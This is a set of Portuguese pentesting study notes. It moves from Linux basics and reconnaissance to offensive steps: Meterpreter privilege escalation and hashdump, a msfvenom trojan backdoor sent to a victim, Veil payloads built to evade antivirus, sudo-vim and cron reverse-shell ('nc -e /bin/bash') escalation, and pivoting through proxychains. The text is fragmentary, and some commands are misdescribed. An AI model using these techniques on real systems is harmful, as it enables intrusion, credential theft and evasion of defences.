Escolar Documentos
Profissional Documentos
Cultura Documentos
conhecimentos======================================================================
===================================================================================
===================================================================================
==================================
/bin – contem aplicações (binários) comuns a todos usuários
/boot – arquivos de inicialização, kernel, gerenciador GRUB
/dev – possui diversas referências aos dispositivos periféricos
/etc – arquivos de configuração do sistema e serviços
/home – diretórios e arquivos dos usuários do sistema
/lib – arquivos de biblioteca comuns as aplicações e usuários
/mnt – diretório para montagem de sistemas externos
/opt – geralmente contem softwares de terceiros
/proc – sistema de arquivos virtual com informações de recursos
/root – diretório padrão do usuário root (superusuário)
/sbin – programas usados pelo sistema e pelo administrador
/tmp – espaço temporário para uso do sistema e aplicações
/usr – bibliotecas, documentações, aplicações relacionadas a usuários
/var – armazenamento variável de logs, e-mails, bancos de dados, web
===================================================================================
===================================================================================
===========
===================================================================================
===================================================================================
========
Maneira de criar um usuario no sistema de forma mais controlada para
gerenciar usuario
deluser:deleta user
para escalar o privilégio desse "user" volte para o root# e use o seguintes
comandos..
===================================================================================
===================================================================================
===================================================================================
====================================================================
Usando o ls
===================================================================================
===================================================================================
===================================================================================
===================================================================================
====================
gerenciando serviços
===================================================================================
===================================================================================
===================================================================================
====================================================================
Gerenciando processos
permissões
r = read
w = write
d = directory
x = execute
===================================================================================
===================================================================================
===================================================================================
===================================================================================
=====
===================================================================================
===================================================================================
===================================================================================
====================================================================
ifconfig: visualiza interface de rede
&: usa 2 comandos ao mesmo tempo
&&:termina um comando e depois executa outro
route: vê nosso gateway nossa rota
free: mostra status do sistema
free -m :mostra status em megabytes
=================================================================================
Gerenciamento de pacotes
apt:é o gerenciador de pacote kali e ubunto são baseados no Debian
apt-get update: atualiza os pacotes
apt-get remove: remove pacote
apt-get upgrade:atualiza o kali a distribuição
===================================================================================
===================================================================================
===================================================================================
===================================================================================
=====
egrep:maneira mais pratica de injetar comando com apenas um | para o comando não
ser tão grande
exemplo egrep -v(que não contem na linha) "var/www/html|bin/bash" + arquivo que
deseja que não
liste tais palavras.
awk:awk -F(fild o campo que quero dividir) '{print $1}' me traz a primeira coluna +
arquivo
===================================================================================
===================================================================================
===================================================================================
=======================================================================
Reconhecimento
*Shodan
=======================================
wafw00f + site ou ip para verificar se a aplicação possui firewall
gobuster dir -u + alvo -w + wordlist -v verbose x- (php, filtro de pesquisa) -e
trás toda a saida
whois
host
nslookup
dig
dnsenum
dnsrecon
fierce
telnet
netcat
openssl s_clint -quiet -connect +www.site ou ip:443
whatweb -a 3(agrssive mode) | sed 's/, /\n/g'
banner grabing
curl + site: uso com http ele traz a pagina em código HTML traz o código fonte
curl -v + site: traz mais detalahado.
curl --head + site: traz o HEADER do site.
curl --head -s + site: me traz em modo silent menos barulheno.
curl -v -H "user-agent:" + site:para mudar o user agent
curl -X para testar métodos
===================================================================================
==
Criando requisições.
printf "HEAD /HTTP/1.1/r/n/r/n" | nc + ip ou site + porta não esquece de usar
/r/n/r/n 4 vezes
echo -e "HEAD /HTTP/1.1/r/n/r/n" | nc + ip ou site + porta não esquece de usar
/r/n/r/n 4 vezes
Mirror website
wget -m + dominio
caso tenha um arquivo robots.txt e ele bloqueia o clonning do website
você pode tentar de outra forma.
wget -m -e robots=OFF + dominio
===================================================================================
===================================================================================
===================================================================================
===========================================
rede e varredura(scanning)
===================================================================================
===================================================================================
===================================================================================
============================================================
Alterando ip
acessando o arquivo etc/network/interfaces ao abrir só possui a entrada de loopbeck
podemos criar um
dhclient eth0:Quando vc estiver em uma rede com dhcp pode usar esse comando para
tentar pegar
um endereço ip automaticamente
=======================================SOCAT=======================================
===================================================================================
===================================================================================
===================================================================================
==========================
socat - tcp4-listen:2222:Vai abrir uma porta tcp e escutar
socat - tcp4-listen:2222:Vai abrir uma porta udp e escutar
socat - tcp4:ip:2222:para se conectar aquela porta
socat tcp4-listen:2222 EXEC:/bin/bash : para mandar o bin/bash para maquina se
conectar
===================================================TRACEROUTE======================
===================================================================================
===================================================================================
===================================================================================
=========================================
ping -c (pacotes) -t (time to live)
traceroute + site: ele percorre todos o roteadores que o pacote está passando.
hops são saltos.
traceroute -w 1(tempo de resposta) + site:me da mais um tempo de resposta
traceroute -m (TTL)
traceroute -f:DETERMINA DE QUAL SALTO TU QUER CONTINUAR (HOPS)
traceroute -A: mostra os asn(autonomos system)
agora para testar quais tipos de pacotes são aceitos
traceroute -n: não identifica o host deixa a saida mais limpa.
traceroute -I: icmp para ver se o host aceita ICMP
traceroute -T:Para identificar se o host aceita tcp
traceroute -p: para vê se o host aceita o protocolo que vc determinar
traceroute -U: por padrão o traceroure já opera no UDP mas com esse comando ele vai
fixar na porta 53(dns)
===================================================================================
===================================================================================
===================================================================================
===================================================================================
===========================================
arping -c(pacotes) usado em rede interna para descobrir host ativos
arp-scan -l ou ip + ip/24
ping -c -t -w +ip
fping -a -g ip/24
=================================================IPTABLES==========================
===================================================================================
===================================================================================
===================================================================================
===================================
iptables -nL:para vê as regras de firewall na maquina
iptables -P INPUT DROP: ela muda a politica para dropar tudo de trafego de entrada
Para aceitar determinada porta
iptablees -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -F:zera todas regras elas são resetadas
iptables -A INPUT -p icmp -j ACCEPT: aceita entrada de ICMP
iptables -A INPUT -p tcp --dport 80 -s (ip) -j ACCEPT no caso sómente esse ip
conseguiria acessar a porta 80
iptables -A INPUT -p icmp --icmp-type 8 : isso significa que o tipo de entrada icmp
que vai ser aceitada é o echo request
iptables -A INPUT -p udp -j ACCEPT : vai permitir tudo que é entada udp
=========================================NMAP E
SCRIPTS============================================================================
===========================================================================
Aprofundando varreduras de rede
agressividade
Bem lentos
-T0 prevenção de firewall em geral
-T1
-T2
-T3 Padrão Nmap
Bem Agressivos
-T4 Scan rápido
-T5 Scan muito barulhento
nmap + alvo + a porta que vai rodar o script + --script= + nome do script
vamos gerar um certificado e uma chave criptografada para criar essa comunicação
criptgrofada
openssl req -x509(gera certificado) -newkey(chave rsa podendo ser outra) rsa:2048
-keyout(saida da chave renomea o nome da chave) chave.pem -out(saida do
certificado) cert.pem
-days(quantidade de dias desse certificado) 10
===================================================================================
===================================================================================
====================================
informações ulteis de possiveis
OS
posso saber qual tipo de sistema através do ping e o traceroute através do ttl(Time
to live)
Linux 64
Windows 128
Unix 255
freebsd 64
======================================================ENUMERAÇÂO===================
===================================================================================
===================================================================================
===================================================================================
=================
Enumerando SMTP na porta25
DATA : depois dou um enter e posso digitar mensagem que eu quero mandar.
Para encerrar mensagem dou um ponto (.) e mais um enter.
===================================================================================
===================================================================================
===================================================================================
===================================================================================
========================================================================
Pop 3 é usado como caixa de entrada onde visualiza as mensagens que são recebidas
nbtscan -r(passa o range da rede /24) vai escania toda rede pelo protocolo Netbios
smb-client -L \\+ip
smbclient //+ip/+caminho -N
agora para falar para o smbclient que vc quer usar uma vesão anterior
basta passar --option='client protocol min:NT1'
?:mostra os comandos
=====================================ENUM4LINUX====================================
===================================================================================
===================================================================================
===================================================================================
=====================================
Automatizando enumeração de netbios e smb com enum4linux
-u:passa usuarios
-p:passa senha
Windows
1-Escalando privilégios no windows
sysinfo:mostra info de sistema.
hashdump:para mostrar credenciais de usuarios.
ps:mostra processos.
migrate:migra processo sempre migrar para o explorer.
getpid:mostra em qual processo sua shell sua maquina está.
getsystem:para elevar privilegio.
whoami:mostra qual usuario vc é se é admin ou user comum.
Para usar exploit para escalar privilegios procure por ''uac''.
exploit -z:joga para background direrto.
getuid:mostra teu usuario se é admin ou não.
?:mostra manual e informações.
===================================================================================
2-Extraindo dados
Documentações importantes
etc/passwd:É o arquivo mais cobiçado por Hackers porque contém os dados pessoais do
usuário como o
login, uid, telefone e senha (caso seu sistema esteja usando senhas ocultas, a
senha terá um * no
lugar e as senhas reais estarão armazenadas no arquivo /etc/shadow ). Conhecimentos
extrás
==========================================================CRIANDO UM
BACKDOOR===========================================================================
===================================================================================
================================================================================
Criaremos um backdoor e colocaremos dentro de um executavel ou seja um binario que
é usado para instalação de um programa
e depois mandaremos para vitima para ter acesso a maquina alvo.
Feito isso msfvenom vai gerar o payload e vamos ultilizar esse arquivo como um
trojan.
Para baixar o arquivo jogue para o var/www/html e depois acessa o ip no win 7 que é
o alvo para baixar o trojan.
===========================================================VEIl====================
===================================================================================
===================================================================================
=================
Veil é uma ferramenta de evasão e através dela é possivel gerar um payload e
tranformar ele em .exe ele faz isso
automaticamente ele ajuda a burlar ferramentas de proteções que estão
desatualisadas.
use 1 depois da um list e vai trazer vários payloads disponiveis tenha sempre
prefenrencia por linguagens
de script vou pegar o go/meterpreter/rev_https depois set lhost + maquina local
set lport 443 e depois um options
(vê as configurações)
generate = cria o payload e jogar para um arquivo .exe e da o nome e ele vai
compilar.
vou subir o postgre service postgresql start vou acessar o diretório que o veil da
para acessar o multihandler
agora vamos abrir no metasploit com msfconsole -r (recusrso) e nome do arquivo.exe
para sair do veil = exit
===================================================================================
===================================================================================
====================================
1-Escalando privilégios no windows
2-Extraindo dados
find / -writable -type d 2>/dev/null/ vai pesquisar por diretórios que tenho
permissão de escrita
===================================================================================
======================
Enumeração de forma automatizada
linpeas
suggester
===================================================================================
=======================
Escalando privilégio abusando de permissões do sudo
se tiver o vim podemos executar o vim com o sudo e é possivel ganhar root com o
vim.
vim -c '!id':veja que ele consegue passar o comando e depois entra no vim.
Sabendo disso então podemos executar o vim com sudo vim -c '!id' para fazer um
teste
se ele executou como root significa que a gente poderia executar qual quer tipo de
comando na maquina,
eu poderia dar um vim -c '!bash' e ele me daria um bash e vai me dar o root no
sistema.
===================================================================================
=======================
linux priv cron
Se possuir um arquivo com permissão 777 pode usar o nano ou vim para editar e usar
o netcat para criar
uma revese shell dentro do arquivo nc -e /bin/bash + o ip da maquina atacante e
aguardar para uma cone
xão então quando o script do cron for ativado tu vai receber o root.
===================================================================================
=======================
linux priv kernel
Quando for fazer download usando o wget e der erro tenta dar um --no-check-
certificate e da um enter
nunca esqueça de dar permissão para os arquivos que tu realizou download chmod +x
arquivo
===================================================================================
=======================
Pós explotation pivoting técnica de pula de um computador para outro Pensa que tu
conseguil uma shell
em um servidor e ela possui um segmento de rede tu vai varrendo esse segmento até
chegar na parte mais
profunda de um rede externa para tentar conectar em uma rede interna.
Sempre que vai fazer pivolting verifique a rede com um ifconfig ou ipconfig também
virificar o route para
vê a tabela de rotiamento para verificar se tem rota para uma outra rede e tentar
fazer pivolt para essa
rede migrar para ela.
E como podemos fazer isso o própio metasploit já possui vários métods para
facilitar isso
podemos usar determinado comando como: run autoroute -s(passa a rede que queremos
se comunicar passa a rota exemplo 10.10.20.0/24)
posso dar um background no meterpreter e usar um módulo auxiliar para varrer a rede
o
use auxiliary/server/socks4a isso vai fornecer um proxy, o que a gente vai fazer
aqui a gente vai abrir a porta
1080 para fechar um proxy aqui e vamos ultilizar o proxy chains que é um prgrama
para a gente se comunicar com essa rede da nossa
maquina local então se eu vim na minha maquina e verificar as portas que estão
rodando com netstat -nlpt não vou ter nenhuma
porta aberta, a parti do momento que eu subir esse servidor proxy vai abrir a porta
1080 eu dou um run no auxiliary agora
vai ter a porta 1080 rodando localmente na minha maquina então posso vim em nano
/etc/proxychains.conf e no final da linha
podemos fazer a configuração por default ele tá para usar o tor dai edita o socks4
para porta 1080 que é o nosso porxy
feito isso já estou pronto para se comunicar através do proxychains e agora eu
consigo me comunicar diretamente com aquela rede
agora posso fazer uma varredura para tentar encontrar mais hosts naquela rede
interna
exemplo:
proxychains nmap e etc
Depois que varreu a rede e encontrou outros hosts posso fazer um tunelamento volto
para a sessão
e vou fazer um tunelamento fazer uma configuração para redirecionar a porta
comando:
portfwd add -l(porta local) 110 -p(porta remota)110 -r(alvo host ip do alvo)